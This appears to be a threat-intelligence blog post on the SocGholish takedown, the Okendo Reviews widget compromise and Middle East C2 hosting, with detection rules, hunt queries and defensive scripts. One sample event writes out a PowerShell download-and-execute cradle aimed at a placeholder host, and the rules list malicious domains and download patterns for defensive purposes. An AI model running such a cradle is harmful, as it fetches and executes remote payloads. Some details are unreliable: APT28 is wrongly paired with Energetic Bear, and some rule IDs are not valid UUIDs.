
SocGholish Takedown, Okendo Supply Chain & Middle East C2 Expansion: OTX Pulse Analysis

Security Arsenal Team
June 21, 2026

Recent OTX pulses highlight a disturbing convergence of nation-state infrastructure build-up and "Initial Access as a Service" operations. While Operation Endgame has successfully disrupted the SocGholish (TA569) malware framework—taking down 106 servers and remediating 15,000 WordPress sites—threat actors are rapidly pivoting to supply chain compromises to maintain access.

Simultaneously, intelligence from the Middle East reveals a massive consolidation of Command-and-Control (C2) infrastructure, with 72.4% of 1,350+ identified C2 servers hosted on a single Saudi ISP (STC). This infrastructure supports diverse threats ranging from IoT botnets (Hajime, Mirai) to sophisticated APT toolkits (Sliver, Cobalt Strike) and wipers (DYNOWIPER).

Of particular concern is the Okendo Reviews supply chain attack by SmartApeSG. By injecting malicious JavaScript into a legitimate e-commerce widget used by 18,000+ brands, the actors deliver NetSupport RAT and Remcos directly to high-traffic retail sites. This mirrors the tactics of the disrupted SocGholish campaign (fake browser updates), indicating that the "ClickFix" social engineering vector remains resilient despite law enforcement takedowns.

Threat Actor / Malware Profile

Key Actors & Malware

  • SmartApeSG: Observed leveraging a supply chain attack on the Okendo Reviews widget. They utilize malicious JavaScript injection to load a staged payload which ultimately delivers Remote Access Trojans (RATs) like NetSupport, Remcos, and StealC.
  • GOLD PRELUDE / TA569: The operators behind SocGholish. Despite Operation Endgame disruptions, their ecosystem (IcedID, Pikabot, QakBot) remains historically significant as a primary dropper for ransomware crews.
  • APT28 / Energetic Bear: Associated with the massive Middle Eastern C2 infrastructure spike, utilizing frameworks like Sliver and Cobalt Strike alongside wiper malware (DYNOWIPER, RondoDox) targeting Energy and Government sectors.

Tactics, Techniques, and Procedures (TTPs)

  • Distribution:
    • Supply Chain: Malicious JS injection into third-party widgets (Okendo).
    • SEO Poisoning / Compromised Sites: Fake browser update prompts (SocGholish style).
  • Payload Behavior: The injected JavaScript acts as a loader, utilizing obfuscation and localStorage to stage second-stage payloads. In the Middle East campaigns, actors are employing heavy obfuscation via frameworks like Tactical RMM and AsyncRAT.
  • Persistence: Use of Scheduled Tasks and Registry Run keys for NetSupport RAT and Remcos.
  • C2 Communication: Heavy reliance on HTTP/HTTPS for C2, utilizing SSL/TLS to blend in with legitimate web traffic.

IOC Analysis

The provided intelligence offers a mix of network indicators and software vulnerabilities:

  • Hostnames (C2 & Infrastructure): The SocGholish and Okendo pulses provide specific malicious hostnames (e.g., trademark.iglesiaelarca.com, api.wigetticks.com). These are critical for immediate DNS blocking and firewall deny-listing.
  • URLs: Specific malicious URLs for the compromised Okendo widget (http://cdn-static.okendo.io/...). SOCs should inspect proxy logs for GET requests to these specific paths.
  • CVE: CVE-2025-11953 is referenced in the Middle East report, likely linked to the initial access vector for the wiper deployment.

Operational Guidance: SOC teams should ingest these IOCs into SIEM correlation engines and EDR threat feeds. While the hostnames indicate active C2 or redirectors, the sheer volume (1,350+ C2s in the Middle East) suggests automated blocking of the ASNs associated with the identified bulletproof hosting providers is more effective than individual IP blocking.
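The hostname indicators above are apex domains, while proxy logs record full hostnames (api.wigetticks.com, billing.roofnrack.us). A naive substring test also flags unrelated names such as notroofnrack.us. The following is an added example (not tooling from the page or from Security Arsenal) that matches proxy log hosts against the IOC apexes on label boundaries; the log lines and client IPs are constructed for the demo, and the apex list is taken from the IOC Analysis section.

```python
import re
from typing import List, Optional, Tuple

# Apex domains from the IOC Analysis section. cdn-static.okendo.io is
# deliberately absent: it is the legitimate widget CDN, and blocking its apex
# would break every store using it; the page says to match its malicious paths.
IOC_DOMAINS = {
    "wigetticks.com",
    "wizzleticks.com",
    "iglesiaelarca.com",
    "garretttrails.org",
    "roofnrack.us",
}


def host_matches_ioc(hostname: str, iocs=IOC_DOMAINS) -> Optional[str]:
    """Return the IOC apex that `hostname` equals or sits under, else None.

    Matching walks label boundaries, so api.wigetticks.com matches
    wigetticks.com but notroofnrack.us does not match roofnrack.us
    (a plain 'contains' test would flag it).
    """
    labels = hostname.strip().lower().rstrip(".").split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in iocs:
            return candidate
    return None


# Constructed proxy access-log lines: timestamp, client IP, method,
# host[:port], path, status. Not real telemetry.
SAMPLE_PROXY_LOG = """\
2026-06-21T09:12:01Z 10.0.4.21 GET api.wigetticks.com /v1/reviews.js 200
2026-06-21T09:12:02Z 10.0.4.21 GET cdn-static.okendo.io /widget.js 200
2026-06-21T09:13:45Z 10.0.7.9 GET notroofnrack.us /index.html 200
2026-06-21T09:14:10Z 10.0.7.9 GET billing.roofnrack.us /chrome-update.zip 200
2026-06-21T09:15:00Z 10.0.2.3 CONNECT trademark.iglesiaelarca.com:443 - 200
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) "
    r"(?P<host>[^\s:]+)(?::\d+)? (?P<path>\S+) (?P<status>\d+)$"
)


def scan_proxy_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (client, host, matched_ioc) for each line whose host is an IOC domain."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the hunt
        ioc = host_matches_ioc(m["host"])
        if ioc:
            hits.append((m["client"], m["host"], ioc))
    return hits


if __name__ == "__main__":
    for client, host, ioc in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{client} -> {host} (matches IOC {ioc})")
```

Three of the five constructed lines should match (the wigetticks, roofnrack and iglesiaelarca hosts); the legitimate Okendo CDN and the look-alike notroofnrack.us host should not.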

Detection Engineering

The following detection logic targets the specific behaviors identified in these pulses: the malicious JavaScript delivery, the NetSupport RAT deployment common to multiple pulses, and the persistence mechanisms used.

```yaml
title: Potential Malicious Okendo Widget or Supply Chain JS Injection
id: 8d1f4a2b-6c3e-4a5d-9b1a-2c3d4e5f6a7b
description: Detects potential connection to malicious domains associated with the Okendo supply chain attack or SocGholish fake updates.
status: experimental
date: 2026/06/21
author: Security Arsenal
references:
    - https://www.zscaler.com/blogs/security-research/smartapesg-launches-okendo-reviews-supply-chain-attack
    - https://www.infoblox.com/blog/threat-intelligence/hot-take-operation-endgame-vs-socgholish/
tags:
    - attack.initial_access
    - attack.t1195.002
logsource:
    category: proxy
detection:
    selection:
        # Sigma's proxy log source names the requested host cs-host
        # (c-hostname is not a standard field and would not map in backends)
        cs-host|contains:
            - 'wigetticks.com'
            - 'wizzleticks.com'
            - 'iglesiaelarca.com'
            - 'garretttrails.org'
            - 'roofnrack.us'
    condition: selection
falsepositives:
    - Unknown
level: critical
---
title: NetSupport RAT Execution Activity
id: 9e2g5b3c-7d4f-5b6e-0c2b-3d4e5f6a7b8c
description: Detects execution of NetSupport Manager client (client32.exe), frequently used in recent supply chain and fake update campaigns including Okendo and SocGholish.
status: experimental
date: 2026/06/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6674a1c2d9f8b
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
detection:
    selection_image:
        Image|endswith:
            - '\client32.exe'
            - '\client64.exe'
    selection_pe_name:
        # A binary renamed on disk still carries the PE OriginalFileName
        OriginalFileName: 'client32.exe'
    # Fields inside one selection are ANDed; either indicator alone should fire
    condition: 1 of selection_*
falsepositives:
    - Legitimate administrative use (should be filtered by target list)
level: high
---
title: Suspicious PowerShell Download via Fake Update Patterns
id: 0f1h2i3j-4k5l-6m7n-8o9p-0q1r2s3t4u5v
description: Detects PowerShell commands attempting to download content mimicking browser updates or utilizing obfuscation seen in SocGholish and SmartApeSG campaigns.
status: experimental
date: 2026/06/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6674a1c2d9f8b
tags:
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
detection:
    selection_image:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_download:
        CommandLine|contains:
            - 'downloadstring'
            - 'iex'
    # A YAML mapping cannot repeat the CommandLine|contains key, so the lure
    # terms live in their own selection and the condition ANDs all three
    selection_lure:
        CommandLine|contains:
            - 'update'
            - 'chrome'
            - 'browser'
    condition: all of selection_*
falsepositives:
    - System update scripts
level: medium
```
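The two process-creation rules above hinge on Sigma's condition semantics: the NetSupport rule fires on either the image path or the PE original name (1 of selection_*), while the PowerShell rule needs a download primitive and a lure term together (all of selection_*). The following is an added example, not code from the page or from Security Arsenal, that replays that logic in Python over constructed Sysmon-style events so the difference is visible; every path, filename and URL in the sample events is made up (placeholder.invalid is a reserved placeholder domain).

```python
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed process-creation events with Sysmon-style field names (not real telemetry)
SAMPLE_EVENTS: List[Event] = [
    {"Image": r"C:\Users\Public\client32.exe",
     "OriginalFileName": "client32.exe",
     "CommandLine": r"C:\Users\Public\client32.exe"},
    # Renamed on disk; the PE version resource still reports client32.exe
    {"Image": r"C:\ProgramData\svchost.exe",
     "OriginalFileName": "client32.exe",
     "CommandLine": r"C:\ProgramData\svchost.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://placeholder.invalid/chrome_update.ps1')"},
    # Benign admin script: carries the 'update' lure term but no download primitive
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r"powershell -File C:\scripts\update-inventory.ps1"},
]


def ends_with_any(value: str, suffixes: List[str]) -> bool:
    """Sigma |endswith modifier (case-insensitive, like most backends)."""
    return any(value.lower().endswith(s.lower()) for s in suffixes)


def contains_any(value: str, needles: List[str]) -> bool:
    """Sigma |contains modifier (case-insensitive)."""
    return any(n.lower() in value.lower() for n in needles)


def netsupport_rat_rule(e: Event) -> bool:
    """condition: 1 of selection_*  -> image path OR PE original name."""
    by_image = ends_with_any(e.get("Image", ""), ["\\client32.exe", "\\client64.exe"])
    by_pe_name = e.get("OriginalFileName", "").lower() == "client32.exe"
    return by_image or by_pe_name


def fake_update_powershell_rule(e: Event) -> bool:
    """condition: all of selection_*  -> host image AND download primitive AND lure term."""
    image = ends_with_any(e.get("Image", ""), ["\\powershell.exe", "\\pwsh.exe"])
    download = contains_any(e.get("CommandLine", ""), ["downloadstring", "iex"])
    lure = contains_any(e.get("CommandLine", ""), ["update", "chrome", "browser"])
    return image and download and lure


RULES: Dict[str, Callable[[Event], bool]] = {
    "netsupport_rat": netsupport_rat_rule,
    "fake_update_powershell": fake_update_powershell_rule,
}


def evaluate(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event_index, rule_name) for every rule that matches an event."""
    return [(i, name) for i, e in enumerate(events)
            for name, rule in RULES.items() if rule(e)]


if __name__ == "__main__":
    for idx, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The renamed binary (event 1) is caught only because OriginalFileName is evaluated independently of the path, and the inventory script (event 3) is ignored because the lure term alone does not satisfy an ANDed condition.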

KQL (Microsoft Sentinel)

Hunt for network connections to the specific IOCs and process creation events related to the malware families.

```kql
// Hunt for malicious C2 hostnames from Okendo and SocGholish pulses.
// RemoteUrl may hold a full URL rather than a bare hostname, so a term match
// (has_any) is used instead of the exact in~ comparison.
DeviceNetworkEvents
| where RemoteUrl has_any (
    "trademark.iglesiaelarca.com",
    "content.garretttrails.org",
    "promo.summat10n.org",
    "billing.roofnrack.us",
    "api.wigetticks.com",
    "api.wizzleticks.com"
)
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP
| extend Tactic = "C2 Communication"
```

Kusto does not accept two tabular expressions separated by `;` in one query body, so the process hunt runs as a separate query:

```kql
// Hunt for NetSupport RAT and Remcos processes
DeviceProcessEvents
| where FileName in~ ("client32.exe", "client64.exe", "Remcos.exe")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName
| extend Tactic = "Execution"
```

PowerShell Hunt Script

Checks for active network connections to known malicious IOCs and common NetSupport RAT process artifacts.

```powershell
# IOC Hunt for Okendo/SocGholish C2s and NetSupport RAT
$MaliciousHosts = @(
    "wigetticks.com",
    "wizzleticks.com",
    "iglesiaelarca.com",
    "garretttrails.org",
    "roofnrack.us"
)

Write-Host "[+] Checking for active network connections to malicious IOCs..."
$Connections = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue

foreach ($Conn in $Connections) {
    try {
        # Reverse lookup yields a FQDN (e.g. api.wigetticks.com), so compare against
        # the apex domains as a suffix rather than with -icontains on equality.
        # Note that C2 hosts rarely have a PTR record matching their forward name;
        # Get-DnsClientCache is a better source for the names the host resolved.
        $HostName = ([System.Net.Dns]::GetHostEntry($Conn.RemoteAddress)).HostName
        $Matched = $MaliciousHosts | Where-Object { $HostName -eq $_ -or $HostName -like "*.$_" }
        if ($Matched) {
            Write-Host "[!] Suspicious connection found: $HostName ($($Conn.RemoteAddress)) on PID $($Conn.OwningProcess)" -ForegroundColor Red
            Get-Process -Id $Conn.OwningProcess -ErrorAction SilentlyContinue | Select-Object ProcessName, Path
        }
    } catch {
        # Ignore DNS resolution failures (private or unresolvable addresses)
    }
}

Write-Host "[+] Scanning for NetSupport RAT processes..."
# ProcessName carries no extension, so "client32.exe" would never match
$RATProcesses = Get-Process | Where-Object { $_.ProcessName -in @("client32", "client64") }

if ($RATProcesses) {
    Write-Host "[!] NetSupport RAT process detected!" -ForegroundColor Red
    $RATProcesses | Format-List *
} else {
    Write-Host "[-] No NetSupport RAT processes found."
}
```


Response Priorities

  • Immediate:
    • Block all hostnames and domains listed in the IOC Analysis section at the perimeter firewall and proxy.
    • Kill any processes matching client32.exe, Remcos.exe, or suspicious PowerShell download scripts.
    • Isolate endpoints showing signs of connectivity to the Middle Eastern C2 infrastructure range if outside expected business geography.
  • 24h:
    • Perform credential resets for users who accessed the compromised Okendo widget domains or interacted with the SocGholish fake update prompts.
    • Hunt for the persistence mechanisms (Scheduled Tasks/Registry keys) associated with NetSupport RAT and Remcos on endpoints identified as having suspicious process execution.
  • 1 Week:
    • Conduct a review of all third-party JavaScript widgets and supply chain dependencies. Enforce Subresource Integrity (SRI) where possible.
    • Update EDR policies to specifically flag unsigned or loosely signed executables originating from browser child processes (typical ClickFix behavior).
    • Review network segmentation for OT and Energy sectors to limit lateral movement from IoT botnets identified in the Middle East pulse.
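Subresource Integrity is the control that would have stopped a modified widget from executing: the browser hashes the fetched script and refuses to run it unless the digest matches the integrity attribute. The following added example (not code from the page or from Security Arsenal) computes SRI tokens, mimics the browser's verification (strongest listed algorithm wins, any matching digest of that algorithm passes), and audits an HTML page for cross-origin scripts that carry no pin. The widget body, its tampered copy and the store page are constructed; cdn.placeholder.invalid and shop.placeholder.invalid are placeholder hostnames.

```python
import base64
import hashlib
import re
from typing import Dict, List
from urllib.parse import urlparse

# SRI algorithms in order of strength; the browser keeps only the strongest one listed
STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_hash(data: bytes, algo: str = "sha384") -> str:
    """Produce an integrity token such as 'sha384-<base64 digest>' for a script body."""
    if algo not in STRENGTH:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(data: bytes, integrity: str) -> bool:
    """Browser-style check: strongest algorithm present, pass if any of its digests match.

    Browsers silently load a resource whose integrity attribute has no usable
    token; this audit helper fails closed instead, because an empty pin is a
    policy gap, not a pass.
    """
    parsed: Dict[str, List[str]] = {}
    for token in integrity.split():
        algo, _, digest = token.partition("-")
        if algo in STRENGTH:
            parsed.setdefault(algo, []).append(digest.split("?")[0])  # drop ?options suffix
    if not parsed:
        return False
    strongest = max(parsed, key=STRENGTH.get)
    actual = sri_hash(data, strongest).split("-", 1)[1]
    return actual in parsed[strongest]


SCRIPT_TAG_RE = re.compile(r"<script\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r'([A-Za-z-]+)\s*=\s*"([^"]*)"')


def unpinned_third_party_scripts(html: str, first_party_host: str) -> List[str]:
    """List cross-origin <script src> URLs that carry no integrity attribute."""
    findings = []
    for m in SCRIPT_TAG_RE.finditer(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        src = attrs.get("src")
        if not src:
            continue  # inline script, not a fetched resource
        host = urlparse(src).hostname  # None for same-origin relative paths
        if host and host.lower() != first_party_host.lower() and "integrity" not in attrs:
            findings.append(src)
    return findings


# Constructed widget body and a tampered copy; any change at all must break the pin
WIDGET_ORIGINAL = b"window.Reviews = { render: function (el) { el.textContent = 'ok'; } };\n"
WIDGET_TAMPERED = WIDGET_ORIGINAL + b"/* appended line */\n"
PINNED = sri_hash(WIDGET_ORIGINAL)

# Constructed store page: one first-party script, one unpinned third-party widget,
# one third-party script pinned at a versioned URL (placeholder hosts throughout)
STORE_PAGE = f"""
<html><head>
<script src="/assets/app.js"></script>
<script src="https://cdn-static.okendo.io/widget.js"></script>
<script src="https://cdn.placeholder.invalid/widget-1.2.3.js" integrity="{PINNED}" crossorigin="anonymous"></script>
</head></html>
"""

if __name__ == "__main__":
    print("pinned token:", PINNED)
    print("original verifies:", verify_sri(WIDGET_ORIGINAL, PINNED))
    print("tampered verifies:", verify_sri(WIDGET_TAMPERED, PINNED))
    print("unpinned third-party scripts:", unpinned_third_party_scripts(STORE_PAGE, "shop.placeholder.invalid"))
```

The practical caveat the page's "where possible" hints at: a pin only works for a URL whose content never changes, so widgets served from an unversioned path (the vendor updates the file in place) have to be moved to a versioned or self-hosted copy before SRI can be enforced; until then, the path-level proxy monitoring described in IOC Analysis is the fallback.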
